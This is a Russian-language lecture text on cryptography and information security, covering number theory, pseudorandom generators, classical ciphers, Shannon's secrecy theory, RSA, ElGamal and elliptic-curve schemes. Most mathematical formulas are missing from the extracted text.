Прайс Д. Программирование на языке Паскаль. Практическое руководство. /Пер. с англ. - М.:, Мир, 1987;
Семашко Г.Л., Салтыков А.И. Программирование на языке Паскаль. - М.: Наука. Гл. ред. физ.-мат. лит.,1993;
Фаронов В.В. Турбо-Паскаль. Начальный курс – 1 кн. Практика программирования –2 кн. Учебное пособие. - М.: "Нолидж",1997;
Эрбс Х.-Э., Штольц О. Введение в программирование на языке Паскаль./Пер. с нем. - М.:, Мир, 1989 |
https://doc4web.ru/informatika/zaschita-informacii-2.html | Защита информации 2 5 | https://doc4web.ru/uploads/files/211/5aa25daeca025f8253877e50b27de7ed.docx | files/5aa25daeca025f8253877e50b27de7ed.docx | Введение
Среди способов защиты информации наиболее важным считается криптографический. Он предусматривает такое преобразование информации, при котором она становится доступной для прочтения лишь обладателю некоторого секретного параметра (ключа). В последние годы область применения криптографии значительно расширилась. Ее стали повседневно использовать многие организации, коммерческие фирмы, частные лица. При этом законного пользователя того или иного криптографического средства, прежде всего беспокоит его надежность. Одним из способов оценки надежности является попытка «взлома», т.е. получение доступа к информации без знания ключа. Подобные задачи призвано решать смежное научное направление, называемое криптоанализом. Криптоанализ и криптография объединены общим названием – криптология.
Вводная лекция.
Защита информации – это всевозможные средства и функции, обеспечивающие доступность, конфиденциальность или целостность информации или связи, исключая средства и функции, предохраняющие от неисправностей. Защита информации включает в себя криптографию, криптоанализ, защиту от собственного излучения и защиту (компьютера) от несанкционированного доступа.
Криптография – это раздел прикладной математики, изучающий модели, методы, алгоритмы, программные и аппаратные средства преобразования информации (шифрования) в целях сокрытия ее содержания, предотвращения видоизменения или несанкционированного использования.
Криптосистема – это система, реализованная программно, аппаратно или программно-аппаратно и осуществляющая криптографическое преобразование информации.
Криптоанализ – это раздел прикладной математики, изучающей модели, методы, алгоритмы, программные и аппаратные средства анализа криптосистемы или ее входных и выходных сигналов с целью извлечения конфиденциальных параметров, включая открытый текст.
Из данных определений видно, что криптоанализ занимается задачами, которые в математическом смысле обратные задачи криптографии. Система криптографии и криптоанализа образует новую науку – криптологию.
В развитии криптологии принято выделять три этапа.
Первый этап. (С древних времен до 1949г). Этот этап характеризуется частными, узкоспециальными и вычислительно простыми алгоритмами криптографии и криптоанализа без использования компьютеров. Его часто называют этапом до компьютерной криптографии.
Второй этап. (1949-1976гг.) Этот этап принято отсчитывать с момента публикации американского математика-прикладника К. Шеннона «Теория связи в секретных системах». В этот период принято активно проводились систематические исследования по криптологии с использованием компьютера. Криптология становится математической наукой.
Третий этап. (1976г. – настоящее время). Этот этап можно назвать и «эрой открытой криптологии». Этот этап принято отсчитывать с момента публикации работы американских математиков У.Дифори, М.Хеллмана «Новые направления в криптографии».В этой работе было показано, что «секретная» передача информации возможна (вотличие от результатов Шеннона) без предварительной передачи «секретного ключа».
Главной особенностью этого этапа становится массовое применение криптографии в банковском деле, электронной торговле, компьютерных сетях и других сферах жизнедеятельности.
Современная криптология широко использует теорию вероятностей, математическую статистику, алгебру, теорию чисел и теорию алгоритмов.
Некоторые определения и формулы.
В криптологии общеприняты следующие понятия:
Пространство сообщений – множество всевозможных сообщений . Для сообщений используется также обозначение .
Пространство ключей . Каждый ключ к определяет некоторую подстановку на пространство и обратное преобразование .
Пространство зашифрованных сообщений , состоящее из зашифрованных . Используется также обозначение
Остается уточнить понятие текста. При этом обычно фиксируют некоторую сумму символов, называемую алфавита. Это может быть английский, русский или какой-нибудь другой алфавит. Часто в качестве алфавита используются натуральные числа или символы 0 и 1. Словом называется упорядоченный набор букв данного алфавита. Множество слов обозначают через . Текст набор слов.
Арифметические основы
Основные обозначения.
- множество вещественных (действительных) чисел. Вещественное число – любое положительное число, отрицательное число, или нуль.
- множество натуральных чисел.
- множество целых чисел.
- множество комплексных чисел. Комплексное число – число вида , где и - действительные числа, а - т.н. мнимая единица, т.е. число, квадрат которого равен -1.
- множество рациональных чисел. Рациональное число – число, которое может быть представлено в виде дроби , где и - целые числа ().
Простые числа. Натуральное число > 1 называется простым, если оно не имеет других натуральных делителей, кроме 1 и . Простым числом будет наименьший, отличный от единицы делитель целого числа , >1. Простых чисел бесконечно много.
Взаимно простые числа. Два целых числа и будут взаимно простыми тогда и только тогда, когда найдутся и , такие что .
Наибольший общий делитель. Всякое целое, делящее числа и , называется их общим делителем. Наибольший из общих делителей для чисел и называется наибольшим общим делителем (НОД) и обозначается Ввиду конечности числа делителей одного числа существование и единственность наибольшего общего делителя очевидны. Если то числа и называются взаимно простыми.
Алгоритм Евклида. Способ нахождения наибольшего общего делителя двух целых Для случая положительных чисел и , причем этот способ состоит в следующем. Деление с остатком числа на число приводит к результату где частное является целым положительным числом, а остаток - либо 0, либо положительное число, меньше , Производится последовательное деление:
(2.1)
(где все -положительные целые числа и ) до тех пор, пока не получится остаток, равный 0. Этот последний остаток можно не писать, так что ряд равенств (2.1) закончится следующим образом:
(2.2)
Последний положительный остаток в этом процессе и является наибольшим общим делителем чисел и .
/Пример/
Найдем НОД (175,77).
175=77*2+21;
77=21*3+14;
21=14*1+7;
14-7*2.
Последний положительный остаток равен 7. Следовательно (175,77)=7.
Наименьшее общее кратное. Всякое целое, кратное всех данных чисел, называется их общим кратным. Наименьшее положительное общее кратное называется наименьшим общим кратным (НОК) и обозначается .
Классы вычетов. Числа, сравнимые по модулю , образуют класс вычетов по модулю . Все числа из одного класса имеют один и тот же остаток от деления на . Любое число из класса вычетов называется вычетом по модулю .Соответствующий класс обозначается через . Поскольку соотношение является бинарным отношением эквивалентности, то имеем разбиение целых чисел на классы эквивалентности (классы вычетов). Всего имеется классов вычетов по модулю : .
Функция Эйлера. Арифметическая функция , значение которой равно количеству положительных целых чисел, не превосходящих и взаимно простых с .
Сравнения. Мы будем рассматривать целые числа в связи с остатками от деления их на данное целое положительное число . Каждому целому числу отвечает определенный остаток от деления его на ; если двум целым и отвечает один и тот же остаток , то они называются равностаточными по модулю или сравнимыми по модулю . Сравнимость чисел и по модулю записывается так:
(2.3)
это читается следующим образом: сравнимо с по модулю .
*Доказательство*
Из следует, что
( - остаток от деления на , - неполное частное)
откуда
Обратно, из представляя в виде
выводим
т.е.
. □
Сравнимость чисел и по модулю равносильна: возможности представить в виде , где - целое.
Свойства сравнений.
Два числа, сравнимые с третьим, сравнимы между собой.
Сравнения можно почленно складывать.
Слагаемое, стоящее в какой-либо части сравнения, можно переносить в другую часть, переменив знак на обратный.
Сравнения можно почленно перемножать.
Обе части сравнения можно возвести в одну и ту же степень.
Обе части сравнения можно умножить на одно и то же целое число.
Обе части сравнения можно разделить на их общий делитель, если последний взаимно прост с модулем.
Обе части сравнения и модуль можно умножить на одно и то же целое.
Обе части сравнения и модуль можно разделить любой их общий делитель.
Если сравнение имеет место по нескольким модулям, то оно имеет место и по модулю, равному общему наименьшему кратному этих модулей.
Если сравнение имеет место по модулю , то оно имеет место и по модулю , равному любому делителю числа .
Если одна часть сравнения и модуль делятся на какое-либо число, то и другая часть сравнения должна делиться на то же число.
Первообразные корни. При существуют положительные с условием , например (теорема Эйлера) .Наименьшее из них называется: показатель, которому принадлежит по модулю .
Если по модулю принадлежит показателю , то числа по модулю несравнимы.
Если по модулю принадлежит показателю , то тогда и только тогда, когда в частности (при ), , тогда и только тогда, когда делится на .
Пусть по модулю принадлежит показателю . Тогда делится на . Таким образом, показатели, которым числа принадлежат по модулю , есть делители . Числа, принадлежащие показателю (если такие существуют), называются первообразными корнями по модулю .
Символ Лежандра. Функция чисел и , определенная для простых нечетных и целых , не делящихся на называется символом Лежандра и обозначается
, если сравнение разрешимо, в противном случае же случае
Символ Якоби. Символ Якоби является обобщением символа Лежандра и служит для упрощения вычисления последнего. Пусть - нечетное натуральное число, - его разложение на простые множители. Для всякого целого , , символ Якоби определяется по формуле:
Цепные дроби. Цепная дробь – один из важнейших способов представления чисел и функций. Цепная дробь есть выражение вида
где - любое целое число, - натуральные числа, называемые неполными частными.
Алгебраические основы
Понятие группы.
Группой называется непустое множество с алгебраической операцией * на нём, для которой выполняется первые 3 из четырёх следующих аксиом.
1). Операция * ассоциативна, т.е. для любых .
2). В G имеется единичный элемент (или единица) e такой, что для любого
3). Для каждого a G существует обратный элемент такой, что
4). Для любых
Если дополнительно группа удовлетворяет четвертой аксиоме, то группа называется абелевой или коммутативной.
Множество образует группу относительно операции сложения. То же можно сказать относительно рациональных чисел , вещественных чисел и комплексных чисел .
Через будет отличать аддитивную группу классов вычетов по модулю m.
Если взять все классы вычетов, взаимно простые с модулем m, и определить их умножение по модулю m, то получится группа, обозначаемая через . Число элементов конечной группы называется порядком группы и обозначается через .
Группа называется циклической, если она порождена одним элементом, т.е. в ней имеется такой элемент a, что любой другой элемент представим в виде . Если – отрицательное, то под понимается произведение
Циклическими являются группы и . Группа – циклическая лишь в случае, когда по модулю m существует первообразный корень.
Циклическая группа всегда коммутативна.
Подгруппы групп.
Подмножество группы называется подгруппой этой группы, если H образует группу относительно операции группы .
Подгруппы группы , отличные от тривиальных групп , называется собственными подгруппами.
Гамоморфизмы групп.
Отображение группы в группу называется гомоморфизмом, если оно согласовано с операциями на группах и , т.е. для любых элементов
Кольца и поля.
Кольцом называется множество с двумя бинарными операциями, обозначаемыми символами “+” и “*”, такими что:
1). – абелева группа;
2). Операция умножения ассоциативна, т.е. для всех ;
3). Выполняются законы дистрибутивности, т.е. для всех
и ;
Подкольца.
Подмножество кольца называется подкольцом этого кольца, если оно замкнуто относительно имеющихся операций сложения и умножения и само образует кольцо относительно этих операций.
Гомоморфизмы колец.
Пусть и – кольца. Гомоморфизмом называется отображение, для которого , , при всех
3. Генераторы случайных последовательностей
3.1 Равномерно распределённая случайная последовательность и её свойства
Случайные числа и их генераторы являются неотъемлемыми современных криптосистем. Приведём конкретные примеры использования случайных чисел в криптологии:
1). Сеансовые и другие ключи для симметрических криптосистем, таких как DES, ГОСТ 28 147-89, Blowfish;
2). Стартовые значения для программ генерации ряда математических величин в асимметрических криптосистемах, например, “больших простых чисел” в криптосистемах RSA, ElGamal;
3). Случайные слова, комбинируемые с парольными для нарушения “атаки угадывания” пароля криптоаналитика;
4). Вектор инициализации для блочных криптосистем, работающих в режиме обратной связи;
5). Случайные значения параметров для многих систем электронной цифровой, например DSA;
6). Случайные выборы в протоколах аутенфинации, например в протоколе Цербер (Kerberos);
7). Случайные параметры протоколов для обеспечения уникальности различных реализаций одного и того же протокола, например в протоколах SET и SSL.
Отметим, что для некоторых из этих криптографических применений необходимы огромные массивы случайных чисел, которые по своему назначению требуют конфиденциального использования. Например, в протоколе Цербер сетевой сервер генерирует тысячи сессионных ключей ежечасно. К сожалению, компьютеры по своей конструкции предназначены быть детерминированными системами, поэтому на современных компьютерах генерация случайных чисел весьма затруднительна.
Известно, что проблема генерации случайной последовательности с произвольным законом распределения вероятностей сводится к проблеме генерации так называемой равномерно распределённой случайной последовательности (РРСП), или, как её часто называют в криптографических приложениях, “число случайной” последовательности.
РРСП – случайная последовательность со значениями в дискретном множестве, определённая на вероятностном пространстве и удовлетворяющая двум свойствам - и .
Свойство . Для любого и произвольных значений индексов случайные величины независимы в совокупности.
Свойство . Для любого номера случайная величина имеет дискретное равномерное на распределении вероятностей:
Из базовых свойств и вытекают следующие дополнительные свойства, используемые при генерации случайных чисел.
Свойство . Если – РРСП, то для любого и любой фиксированной последовательности индексов –мерное дискретное распределение вероятностей вектора (слова) является равномерным:
Свойство . Если – элемент РРСП, то справедливы следующие выражения его начального и центрального моментов – го порядка:
Где – числа Бернулли.
Свойство . Для новариационной функции и спектральной плотности РРСП справедливы следующие выражения:
Свойство . (воспроизводимость при прореживании). Для любой фиксированной последовательности моментов времени при “прореживании” РРСП возникает последовательность
,
которая тоже является РРСП.
Свойство . (воспроизводимость при суммировании). Если - РРСП, а – произвольная неслучайная либо случайная последовательность, не зависящая от , то случайная последовательность также является РРСП.
Свойство . Если - РРСП, то количество информации по Шеннону, содержащейся в отрезке последовательности , о будущем элементе равно нулю:
,
поэтому для любого алгоритма прогнозирования вероятность ошибки не может быть меньше, чем для “угадывания по жребию”:
.
Свойство . Если - РРСП, то для любого и произвольной борелевской функции переменных , при имеет место сходимость “почти наверное”:
Свойство . Если – равномерно распределенная последовательность порядка , то – РРСП.
С учетом свойств определим понятия генератора случайной последовательности и его типов.
Генератор РРСП – устройство, позволяющее по запросу получить реализацию равномерно распределенной случайной последовательности длиной ; элементы этой реализации принято называть случайными числами. Существует три типа генераторов РРСП:
1. Табличный.
2. Физический.
3. Программный.
В следующем разделе мы рассмотрим программный генератор.
Программный генератор РРСП – программа имитации на компьютере реализации РРСП. Имитируемая последовательность называется псевдослучайной, так как она вычисляется на компьютере по известному детерминированному (обычно рекуррентному) соотношению, и в то же время её статические свойства “близкие” к свойствам РРСП.
В разделе “Алгоритмы генерации псевдослучайных последовательностей” мы познакомимся с основными методами генерации псевдослучайных последовательностей, а в разделе “Методы генерации истинно случайных последовательностей” мы рассмотрим различные методы повышения “случайности” генераторов РРСП.
3.2 Алгоритмы генерации псевдослучайных последовательностей.
Классификация существующих алгоритмов генерации псевдослучайных последовательностей представлена на рис. Выделяются три основных подхода к построению алгоритмов генерации:
1). Прямые методы построения элементарных рекуррентных последовательностей:
.
2). Методы «улучшения элементарных последовательностей», заключающиеся в специальных функциональных преобразованиях этих последовательностей для уменьшения отклонения их статистических свойств от свойств РРСП.
3). Комбинирование алгоритмов генерации, построенных с помощью первого или второго подхода.
Линейные и мультипликативные конгруэнтные генераторы. Линейным конгруэнтным генератором (ЛКГ) с параметрами () называется программный генератор РРСП, порождающий псевдослучайную последовательность ,, с помощью рекуррентного соотношения
(3.2.1)
Параметры этого генератора (3.2.1) имеют следующий смысл:
- начальное или стартовое значение;
- не нулевой множитель;
- приращение;
- модуль, равный мощности алфавита .
Если приращение , то генератор () называется мультипликативным конгруэнтным генератором (МКГ), а если , то смешанным конгруэнтным генератором (СКГ).
«Слабость» ЛКГ и МКГ заключается в том, что если рассматривать последовательные биграммы , то точки , на плоскости будут лежать на прямых из семейства . Для устранения этого недостатка нелинейные конгруэнтные генераторы, среди которых известны: квадратичный конгруэнтный генератор; Генератор Эйхенауэра-Лена с обращением; конгруэнтный генератор, использующий умножение с переносом.
Квадратичный конгруэнтный генератор. Этот алгоритм генерации псевдослучайной последовательности определяется квадратичным рекуррентным соотношением
, ()
где – параметры генератора. Выбор этих параметров осуществляется на основе следующих двух свойств последовательности ().
Свойство . Квадратичная конгруэнтная последовательность () имеет наибольший период , тогда и только тогда, когда выполнены следующие условия:
1). – взаимно простые числа;
2). – кратны , где – любой нечётный простой делитель ;
3). – чётное число, причем
4). Если кратно 9, то либо , либо и .
Свойство . Если , то наибольший период тогда и только тогда, когда – нечётно, – чётно, – нечётное число, удовлетворяющее соотношению
.
Генератор Эйхенауэра-Лена с обращением. Псевдослучайная нелинейная конгруэнтная последовательность Эйхенауэра-Лена с обращением определяется следующим нелинейным рекуррентным соотношением :
(
где – обратный к элемент по модулю , т.е. - параметры генератора.
Конгруэнтный генератор, использующий умножение с переносом. В этом случае нелинейная псевдослучайная последовательность определяется рекуррентным соотношением:
(
Где в отличие от (), «приращение» изменяется во времени и зависит от указанных аргументов нелинейно:
()
Параметрами нелинейного конгруэнтного генератора (), () является .
Рекуррентны в конечном поле. Обращение мультикапликативной конгруэнтной последовательности является линейная рекуррентная последовательность порядка над конечным полем ( - простое число):
()
где – коэффициенты рекуррентны, а – начальные значения рекуррентны.
Параметры генератора ():. Начальные значения выбираются произвольно так, чтобы не обращались в ноль одновременно. Коэффициенты рекуррентны выбираются таким образом, чтобы порождающий полином
()
являлся примитивным многочленом по модулю , т.е. многочлен () имел корень *, являющийся первообразным элементом поля . При таком выборе параметров достигается максимально возможный период псевдослучайной последовательности ().
Генераторы Фибоначчи. Общий вид рекуррентного соотношения, определяющего генератор Фибоначчи задаётся уравнением
, ()
где – параметры генератора, . В случае или - целые числа .
4. Первый этап развития криптографии
Защита информации может быть двух видов: шифрование и передача по закрытому каналу.
Предполагается, что сообщения передаются по так называемому “открытому” каналу связи, в принципе доступного для прослушивания некоторым другим лицам, отличным от получателя и отправителя.
Будем считать, что A (Алиса) – отправитель сообщения, а В (Боб) – корреспондент (получатель) сообщения, Е (Елена) – некий враг.
Классическая система секретной связи показана на рис. 1.
Е
источник ключа
А
шифратор
В
дешифратор
Классическим примером шифра подстановки (замены) является шифр Цезаря. При шифровании с его помощью каждая буква латинского алфавита циклически вправо на позиций. Таким образом, имеем некоторую подстановку замену.
Шифрование осуществляется в соответствии с этой подстановкой. Величина не является единственно возможной.
Криптоанализ этого шифра очень прост. Для любого современно языка вычислены частотные характеристики букв, т.е. относительные частоты их появления в “нормальных” текстах.
Модулярный шифр.
Выберем число , взаимно просто с модулем. Пусть р – буква английского алфавита, отождествлённая со своим порядковым номером (0,1,…,25). Тогда ,, где – фиксировано. В этом случае ключом является пара чисел . Условие взаимной простоты необходимо для обратимости шифра.
Гомофоническое шифрование.
Один из способов защиты от частотной криптоатаки. Каждая буква текста шифруется несколькими символами этого или другого алфавита. Число этих символов пропорционально частотной характеристики шифруемой буквы.
Полиграммное шифрование.
При полиграммном шифровании заменяются не буквы текста, а их комбинации. Если заменяются пары букв, то мы имеем биграмное шифрование. Примером такого шифрования является шифр Плейфера. Образуем из алфавита квадрат
Замена биграмм производится по правилам:
1) если и находятся на одной строке, то биграмма шифруется диаграммой , где буквы и являются правыми соседями букв и соответственно, если правого соседа нет, то берется буква строки.
2) если и находятся на одном столбце, то берутся нижние соседи с аналогичной оговоркой.
3) если , то в незашифрованном тексте между ними вставляется незначащая буква (например, ).
4) при нечетном количестве букв в незашифрованном тексте к нему дописывается незначащая буква.
5) в наиболее вероятном количестве, когда и расположены в разных столбцах и строках, и выбираются, как показано на схеме:
Код Энигма.
Одним из ярких примеров докомпьютерных шифров является код Энигма. По своей сути он является кодом замены. Код Энигма был реализован на базе машины инженера Кирха. Эта машина представляла собой ряд вращающихся на одной оси барабанов с электрическими контактами, обеспечивающих множество вариантов простой замены, определяемой текущим положением барабанов. В ранних моделях было пять барабанов, которые перед началом работы устанавливались по кодовому слову, а в ходе кодирования поворачивались при кодировании очередного символа. Слабым местом системы было ограниченное число барабанов и их редкая замена, что вызвало охоту англичан за экземплярами машины Кирха в подводных лодках Германии.
Код Энигма в своем первоначальном виде потерял свою привлекательность при появлении ЭВМ, т.к. пять барабанов могли обеспечить лишь около ста миллионов ключей, что возможно перебрать за один день.
5. Второй этап развития криптографии
5.1 Шенноновское понятие секретных систем
По Шеннону существует три общих типа секретных систем:
1. Системы маскировки, которые включают в себя применение таких методов, как невидимые чернила, представление сообщения в форме безобидного текста или маскировки криптограммы, и другие методы, с помощью которых факт наличия сообщения скрывается от противника;
2. Тайные системы (например, инвертирование речи), в которых для раскрытия сообщения требуется специальное оборудование;
3. «Собственно» секретные системы, где смысл сообщения скрывается при помощи шифра, кода и т.д., но само существование сообщения не скрывается и предполагается. Что противник обладает любым специальным оборудованием, необходимым для перехвата и записи переданных сигналов.
Математически криптограмма выглядит следующим образом: , где – сообщение, – ключ, т.е. является функцией от и .
Оценка секретных систем.
Имеется несколько различных критериев, которые можно использовать для оценки качества секретной системы. Рассмотрим их подробнее.
1) Количество секретности.
Некоторые секретные системы являются совершенными в том смысле, что положение противника не облегчается в результате перехвата любого количества сообщений. Другие системы, хотя и дают противнику некоторую информацию при перехвате очередной криптограммы, но не допускают единственного «решения». Системы, допускающие единственное решение, очень разнообразны как по затрате сил и времени, необходимых для получения этого решения, так и по количеству материала, который необходимо перехватить для получения единственного решения.
2) Объем ключа.
Ключ должен быть передан из передающего пункта в приемный пункт таким способом, чтобы его нельзя было перехватить. Иногда его нужно запомнить. Поэтому желательно иметь ключ настолько малый, насколько это возможно.
3) Сложность операции шифрования и дешифрования.
Операции шифрования и дешифрования должны быть, конечно по возможности, простыми. Если эти операции производятся вручную, то их сложность приводит к потере времени, появлению ошибок и т.д. Если они производятся механически, то сложность приводит к использованию больших и дорогих устройств.
4) Разрастание числа ошибок.
В некоторых типах шифров ошибка в одной букве, допущенная при шифровании или передаче, приводит к большому числу ошибок в расшифрованном тексте. Такие ошибки разрастаются в результате операции дешифрования, вызывая значительную потерю информации и часто требуя повторной передачи криптограммы.
5) Увеличение объема сообщения.
В некоторых типах секретных систем сообщения увеличиваются в результате операции шифрования. Этот нежелательный эффект можно наблюдать в системах, в которых делается попытка потопить статистику сообщения в массе добавляемых нулевых символов, или где используются многократные замены.
Совершенная секретность.
Предположим, что имеется конечное число возможных сообщений. с априорными вероятностями и что эти сообщения в возможные криптограммы , так что – отображение, которое приводит сообщение к криптограмме .
После того, как шифровальщик противника перехватил некоторую криптограмму , он может вычислить апосториорные вероятности различных сообщений .
Необходимое и достаточное условие для того, чтобы система была совершенно секретной, можно записать в следующем виде
где – априорная вероятность сообщения ;
– условная вероятность криптограммы при условии, что выбрано сообщение , т.е. сумма вероятностей всех тех ключей, которые переводят сообщение в криптограмму ;
– вероятность получения криптограммы ;
– апостериорная вероятность сообщения при условии, что перехвачена криптограмма .
Для совершенной секретности системы величины и должны быть равны для всех и . Следовательно, должно быть выполнено одно из равенств:
или же , для любых и .
Если , то , и система совершенно секретна.
Теорема.
Необходимое и достаточное условие для совершенной секретности состоит в том, что
для всех и , т.е. не должно зависеть от .
Ненадежность.
Имеется два основных типа ненадежности: ненадежность ключа и ненадежность сообщения.
– ненадежность ключа;
– ненадежность сообщения.
,
,
где , , – криптограмма, сообщение, ключ.
– вероятность ключа и криптограммы .
– апостериорная вероятность ключа , если перехвачена криптограмма .
– вероятность сообщения и криптограммы .
– апостериорная вероятность сообщения , если перехвачена криптограмма .
Для кода подстановки.
6. Третий этап развития криптографии
Идею, лежащую в основе криптосистем с открытым ключом, высказали в 1975 году Диффи и Хелмен. Они ввели понятие односторонней функции с секретом. Это дало принципиальную возможность разрабатывать криптосистемы с открытым ключом, в которых алгоритм шифрования является общедоступным, и поэтому нет необходимости в секретных каналах связи для предварительного обмена ключами.
При шифровании с открытым ключом для шифрования и расшифрования используются разные ключи, и знание одного их них не дает практической возможности определить второй.
6.1 Шифр Ривеста – Шамира – Алдемана
Первой и наиболее известной криптографической системой с открытым ключом была предложенная в 1978 году система RSA (Массачусетский технологический институт). Она основана на трудности разложения больших целых чисел на простые сомножители.
Исходный текст должен быть переведен в цифровую форму. В результате текст представляется в виде одного большого числа. Затем полученное число разбивается на части так, чтобы каждая из них была числом в промежутке от до . .
Пользователь , отправляющий сообщение , шифрует его следующим образом: . Этот текст получает только пользователь .
Чтобы восстановить исходный текст, поступает следующим образом:
1. Находит число , такое, что и .Это сравнение разрешимо единственным образом, поскольку .
Для решения сравнения пользователь должен вычислить .
Любой другой пользователь, который знает только , вынужден находить и , т.е. разлагать число на простые множители, а эта задача при больших и имеет большую вычислительную сложность. Далее пользователь вычисляет .
Алгоритм применения RSA.
1. Отправитель выбирает два больших простых числа и . Вычисляет два произведения и
2. Затем он выбирает случайное число (целое), взаимно простое с , и вычисляет , удовлетворяющее условию .
3. После этого он публикует и как свой открытый ключ шифрования, сохраняя как закрытый ключ.
4. Если – сообщение, длина которого, определяемая по значению выражаемого им целого числа, должна быть в интервале , то она превратится в криптограмму возведением в степень по модулю и отправляется получателю в следующем виде .
5. Получатель сообщения расшифровывает его. Возводя в степень по модулю , так как
Пояснение.
Таким образом, открытым ключом служит пара чисел и , а секретным ключом число . Крипкостойкость системы RSA основана на том, что не может быть просто вычислена без значения и , нахождение этих сомножителей из достаточно трудоемко.
Электронная подпись (цифровая подпись).
Если планирует подписывать документ Ц.П., то он должен выбрать параметры RSA. выбирает два простых числа и , вычисляет затем выбирает число ,взаимно простое с , и вычисляет , далее публикует числа и и хранит в секрете . Числа – более не понадобятся.
Пусть хочет подписать сообщение . Тогда вычисляет хеш-функцию , которая ставит в соответствие сообщению число .
Практически невозможно изменить основной текст , не изменив . Поэтому достаточно снабдить только число подписью, и эта подпись будет относиться ко всему сообщению .
Далее вычисляет число , т.е. она возводит число в свою секретную степень. Число – цифровая подпись.
– вид сообщения с подписью.
Теперь каждый, кто знает открытые параметры , т.е. и , может проверить подлинность его подписи.
Для этого необходимо вычислить значение хеш-функции , т.е. число , и проверить равенство .
/*Пример*/ Электронная подпись RSA.
Пусть
(алгоритм Евклида).
(допущение)
вычисляет
– сообщение с подписью
Вычисляем значение хеш-функции, получим
Подпись верна.
Определение Хеш-функции.
Хеш-функцией называется любая функция , которая строке сообщения произвольной длины ставит в соответствие целое число фиксированной длины.
9. Криптографические алгоритмы
9.1 Шифр Эль-Гамаля
Пусть имеются абоненты , которые хотят передавать друг другу зашифрованные сообщения, не имея никаких защищённых каналов связи.
Для всей группы абонентов выбирается некоторое большое простое число и число , такие, что различные степени – различные числа по модулю . Числа и передаются абонентам в открытом виде.
Затем каждый абонент выбирает своё секретное число , , и вычисляет соответствующе ему открытое число ,
()
В результате получаем следующую таблицу ().
Абонент
Открытый ключ
Секретный ключ
Табл(). Ключи пользователей в системе Эль=Гамаля.
Алгоритм передачи сообщения от к выглядит следующим образом: будем считать, что сообщение .
Шаг 1. Алиса формирует случайное число , , вычисляет числа:
(9.1.2)
(9.1.3)
и передаёт пару чисел абоненту Бобу.
Шаг 2. Боб, получив , вычисляет
(9.1.4)
/*Пример*/
Алиса хочет передать Бобу сообщение . Допустим Пусть Боб выбрал для себя секретное число и вычислил по формуле (9.1.1)
Алиса выбирает случайное число , например , и вычисляет по (9.1.2) и (9.1.3):
.
Теперь Алиса посылает Бобу шифрограмму (17,12). Боб вычисляет по формуле (9.1.4):
Боб расшифровал сообщение
Электронная подпись на базе Эль-Гамаля.
Алиса выбирает большое простое число и число , такие, что различные степени – это различные числа по модулю . Эти числа передаются или хранятся в открытом виде и могут быть общими для целой группы пользователей. Алиса выбирает случайное число , , которое она держит в секрете. Это её секретный ключ.
Затем она вычисляет число
(9.1.5)
Это число Алиса публикует в качестве открытого ключа. Заметим, что при больших , зная , невозможно найти (это задача дискретного логарифмирования).
Теперь Алиса может подписывать сообщения. Допустим, она хочет подписать сообщение . Опишем последовательность действий для построения подписи.
Вначале Алиса вычисляет значение хеш-функции для сообщения , которое должно удовлетворять неравенству . Затем Алиса случайным образом выбирает число , взаимно простое число с , и вычисляет число:
(9.1.6)
Далее Алиса вычисляет числа:
(9.1.7)
(9.1.8).
Под в (9.1.8) подразумевается число, удовлетворяющее уравнению
(9.1.9)
Такое существует, так как и взаимно просты, и может быть найдено по алгоритму Евклида. Наконец Алиса формирует подписанное сообщение
(9.1.10).
Получив сообщение Боб заново вычисляет значение хеш-функции и проверяет подпись, используя равенство
(9.1.11)
/*Пример*/
Пусть общие параметры для некоторого сообщества пользователей . Алиса выбирает свой секретный ключ и вычисляет открытый ключ по формуле (9.1.5):
Пусть Алиса создала документ и хочет его подписать. Прежде всего Алиса вычисляет хеш-функцию, пусть её значение будет равно . Затем Алиса генерирует случайное число , например, .
9.2 Криптосистемы на эллиптических кривых
Использование эллиптических кривых в криптографических целях было Нило Коблицом и Виктором Миллером в 1985 году. С 1998 года использование эллиптических кривых для решения криптографических задач, таких, как цифровая подпись, было закреплено в стандартах США ANSI X9.62 и FIPS 186-2, а в 2001 году аналогичный стандарт, ГОСТ Р34.10-2001, был принят и в России.
Особое достоинство криптосистем на эллиптических кривых состоит в том, что по сравнению с “обычными” RSA системами, они обеспечивают существенно более высокую стойкость при равной трудоемкости или, наоборот, существенно меньшую трудоемкость при равной стойкости.
В результате тот уровень стойкости, который достигается в RSA при использовании 1024-битовых модулей, в системах на эллиптических кривых реализуется при размере модуля 160 бит, что обеспечивает более простую как программную, так и аппаратную реализацию.
Эллиптические кривые.
Кривая третьего порядка , задаваемая уравнением вида:
(1)
называется эллиптической кривой.
, график кривой симметричен относительно оси абсцисс. Чтобы найти точки ее пересечения с осью абсцисс, необходимо решить кубическое уравнение
(2)
Дискриминант этого уравнения равен
(3)
Если уравнение (2) имеет три различных корня если то (2) имеет три действительных корня (два из которых равны); если уравнение имеет один действительный корень и два комплексно сопряженных.
Графический вид шифрования.
– изменение знака
Алгоритм шифрования.
Для пользователей некоторой сети выбираются общая эллиптическая кривая и некоторая точка , такая, что … - это различные точки, а (точка в бесконечности) для некоторого простого числа .
Каждый пользователь выбирает случайное число , , которое хранит как свой секретный ключ, и вычисляет точку на кривой , которая будет его открытым ключом. Параметры кривой и список открытых ключей передаются всем пользователям сети.
Допустим, пользователь хочет передать сообщение пользователю .
делает следующее:
1. Выбирает случайное число
2. Вычисляет ;
3. Шифрует
4. Посылает криптограмму
Пользователь после получения
1. Вычисляет
2. Дешифрует
{ – угловой коэффициент }
Цифровая подпись.
Для сообщества пользователей выбирается общая эллиптическая кривая и точка на ней, такая, что … суть различные точки, и для некоторого простого числа (длина числа равна 256 бит).
Каждый пользователь выбирает случайное число (секретный ключ), , и вычисляет точку на кривой (открытый ключ). Параметры кривой и список открытых ключей передаются всем пользователям.
Чтобы подписать сообщение, Алиса делает следующее:
1. Вычисляет значение хеш-функции сообщения ;
2. Выбирает случайно число , ;
3. Вычисляет ;
4. Вычисляет (при возвращается к шагу 2);
5. Вычисляет (при возвращается к шагу 2);
6. Подписывает сообщение парой чисел .
Для проверки подписанного сообщения любой пользователь, знающий открытый ключ , делает следующее:
1. Вычисляет ;
2. Убеждается, что ;
3. Вычисляет и ;
4. Вычисляет композицию точек на кривой и если , отвергает подпись;
5. Если , принимает подпись, в противном случае отвергает ее.
9.5 Общие принципы стохастической защиты информации
Метод стохастической защиты информации был разработан как помехоустойчивый код, содержащий признаки и операции введения избыточности при кодировании и принятия решения о наличии ошибок (и исправлении ошибок) при декодировании, объединенные с операциями прямого и обратного стохастического преобразования.
